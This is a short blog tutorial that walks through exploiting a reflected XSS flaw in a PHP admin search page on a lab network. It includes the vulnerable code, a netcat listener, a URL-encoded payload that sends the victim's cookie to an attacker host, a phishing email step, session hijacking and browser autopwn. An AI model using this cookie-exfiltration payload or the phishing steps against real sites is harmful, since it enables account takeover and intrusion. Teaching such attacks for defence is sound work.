From reflected XSS to shell

Written by  on July 8, 2015 

In this scenario we will begin with a simple and easy exploitable reflected XSS attack and then we will move to a cookie stealing scenario and the total pwnage of the remote target.

We begin with this simple web app

1

After checking the DB and then doing the login , the web admin is directed to a page like that:

2

And if we try to search for something we see:

3

We see here a simple search web form, it seems that the admin can use that to search for content in the server DB. the begining of the php code behind that might look like:

<?php
$name = $_GET[‘q’];
if(isset($name)){
?>
<br>
<hr>
You are searching: <?php echo $name; ?>
<br>

As wee see, the content of the text box is printed directly on the page, this looks like the typical reflected XSS bug. We can check that by introducing:

<script>alert(“XSS DETECTED”);</script>

Inside the text box

4

Good, now we have detected the XSS vuln, but how do we exploit it? The answer is simple, as the remote web app uses cookies, we can easily steal the admin cookie and use it to access to the admin account from our attacker box.

First of all we can start our netcat listener on port 80

nc -lvp 80

5

Now we can generate an evil email wich includes a link to the following url:

http://192.168.11.9/app/backend.php?q=%3Chtml%3E%3Cbody%20onload=%27%20location.replace%28%22http://192.168.11.3/%22.concat%28document.cookie%29%29;%27%3E%3C/html%3E

This will try to send the cookie to our netcat listener in our box. Next step will be using social engineering to send a mail to our victim and steal it’s cookie:

6

We can also use a command line tool in Kali to send the evil mail

7

And when our victim visits our mail:

8

We got our victim’s cookie!!

Now we can use an http proxy like paros to use that cookie for browsing the site as admin:

9

Now we can browse the site as admin:

10

But what to do now? We only got the admin account, it looks like we can’t do anything funny here.

We can escalate this attack by first starting some client side exploit, we can use browser autopwn for example

11

We start the server and craft our evil url:

We can use the same trick we did before for redirecting our victim’s to our evil url

12

And when te victim get caught:

13

By setting up this scenario, I dare you to think about all the posibilites of this attack.

Game over P-)

Category : interesting stuff

Tags :

Leave a Reply